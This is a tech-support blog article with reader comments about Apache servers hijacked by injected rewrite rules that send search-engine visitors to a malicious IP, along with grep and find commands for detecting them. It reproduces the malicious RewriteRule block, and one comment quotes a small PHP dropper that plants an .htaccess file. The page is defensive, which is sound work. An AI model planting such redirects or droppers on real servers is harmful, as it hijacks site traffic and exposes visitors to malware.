Industry guru Dave Taylor offers tech support on technical and business topics, including iPhone, iPod, Microsoft Windows, Sony PSP, cellphones, online advertising, CSS, Web design, business, Unix, Linux, SEO, Mac OS X, and shell script programming.     


How can people hack my Apache server with Rewrite rules?

A geeky friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server?

Dave's Answer:

This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus.

Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google...

Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself.

A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L]
Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err

What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (e.g., the major search engines) have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good!

But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see:

$ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L]

Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file.

One more tweak and you could have a simple script that would email you if any of this bad code showed up if run from a cron job (Linux geeks know what I'm talking about):

#!/bin/sh
conf=/usr/local/apache/conf/httpd.conf
grep -i rewriterule $conf | grep http: | grep -v feedburner
exit 0

Easy enough, right?

Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file.

You can check for this from the command line again:

$ cd /usr/local/apache/htdocs
find . -name ".htaccess" -print

Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this:

AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null
AuthName "Growing Your Biz w/ Google Course"
AuthType Basic
<Limit GET>
require user taylor
require user google
require user steven
</Limit>

(You can learn more about password protecting Web site directories here: how to password protect a directory in Apache with .htaccess)

Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time:

$ grep http: $(find . -name ".htaccess" -print)
$

Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above.

Hope that helps you out!

Many thanks to Greg Hughes for his help in isolating and sharing the dastardly code snippet shown above.
More Useful Blogs and Blogging Articles:
✔   Get my shopping cart plugin to work with WordPress?
We've put in a shopping cart for a client that's not working, and we need some help! The cart is currently using the...
✔   Embed an audio player on a blog or web page?
I have some mp3 audio files I've recorded and would like to have people who visit my site be able to listen to...
✔   Can I write a guest review for AskDaveTaylor.com?
Hi Dave. I'm a big fan of your site and love that you're doing so many reviews now. I've noticed, however, that there...
✔   Change author on WordPress blog post?
I have two accounts set up for my WordPress blog and I'd like to be able to have all my posts from a...
✔   How do I restructure my Wordpress blog without losing SEO?
I have a wordpress blog that was using categories in the url structure like this: /category_name/post_name/ Then I had read somewhere that if...
Let's stay in touch!
Sign up for my weekly AskDaveTaylor Newsletter and you'll receive even more tech and gadget help right to your inbox, along with exclusive news and industry updates. It's good stuff. I promise!
    Enter your name: and your email addr:  




Categorized: Blogs and Blogging   (Article 8450, Written by )
Tagged: apache, hacking, http.conf, site hijacking
Previous: What is eBay auction fever?
Next: How can I wipe my old Apple iPhone clean of data?




Reader Comments To Date: 8

paris said, on August 20, 2008 11:16 AM:

Hi Dave,

Great article - thanks.
I've recently seen this popping up in .htaccess files. Do you have any info or links regarding what exploits people are using to do this in the first place?

Dave Cole said, on August 21, 2008 8:32 AM:

I agree with Paris; how are black hats getting into httpd.conf files or .htaccess files in the first place? SSH root access? Oh, and I also agree: it is otherwise a good article. Thanks.

Greg said, on November 18, 2008 1:37 PM:

I add to the thanks for writing this. I also ask for the same additional info on how this can be stopped in the first place. I understand from some sites that poorly written PHP code can lead a person to discover the file structure, but if the sites are secure, how are they able to do anything with that info? What can we do to stop them from using bad code on a user's site against us the whole server?

Dardar said, on December 17, 2008 2:49 PM:

CAn anybody tell me why I can no longer get to www.youtube.com? Instead I get UK.youtube.com, and also many other google searches where the search gives normal websites, homepages, etc. as answers, when I click on them in Google search, I'm instead sent to some "parked" looking spammy type web pages. Is this my Google/local computer with a malware problem or is it the websites? I can't believe youtube (usa) has this problem but I sure can't reach it. Something to do with Hosts file? Don't know what that is... please feel free to email me or respond here. Thanks Dardar

Johann said, on January 29, 2009 4:58 PM:

Thanks for posting this! I was scratching my head wondering how Google could be hacked and why only for my site. This information was a lifesaver!

help said, on February 11, 2009 4:24 PM:

I've been dealing a lot with this type of hack. Now it seems that the directory permissions are being changed to 777 when the htaccess file is uploaded. It seems they are uploading a file called m.php:
<?
rename("htt",".htaccess");
unlink("m.php");
echo "OK";
?>

This file renames a blank file called htt to .htaccess.

Khalid said, on January 6, 2010 11:58 PM:

This is a nice explanation - many thanks!

But like a few others who said the same thing, I'm wondering HOW someone could actually place a file when they don't have a valid password...

Thank you for your time!

Mark said, on April 14, 2011 6:10 PM:

Just in case anyone else stumbles across this again, we just had the same thing happen to our site. Turns out the intruder used a brute force attack to gain access to ftp (we noticed access attemps in the ftp logs dating back 6 months). Once in, an .htaccess file was dropped into every directory, not just root.

Starbucks coffee cup I do have a lot to say, and questions of my own for that matter, but first I'd like to say thank you, Dave, for all your helpful information by buying you a cup of coffee!

I do have a comment, now that you mention it!











I will never send you any unsolicited email. Ever.






Check This Out Too...

 
Recent Entries
Look for Answers
Recommended
Need Help? Ask Dave Taylor!
All Our Categories


Follow Me on Pinterest

Find Me on Google+
ADT on G+
© 2002 - 2013 by Dave Taylor. All Rights Reserved.

Note: This web site is for the purpose of disseminating information for educational purposes, free of charge, for the benefit of all visitors. We take great care to provide quality information. However, we do not guarantee, and accept no legal liability whatsoever arising from or connected to, the accuracy, reliability, currency or completeness of any material contained on this web site or on any linked site. Further, please note that by submitting a question or comment you're agreeing to my terms of service, which are: you relinquish any subsequent rights of ownership to your material by submitting it on this site. My lawyer says "Thanks".
"Ask Dave Taylor®" is a registered trademark of Intuitive Systems, LLC.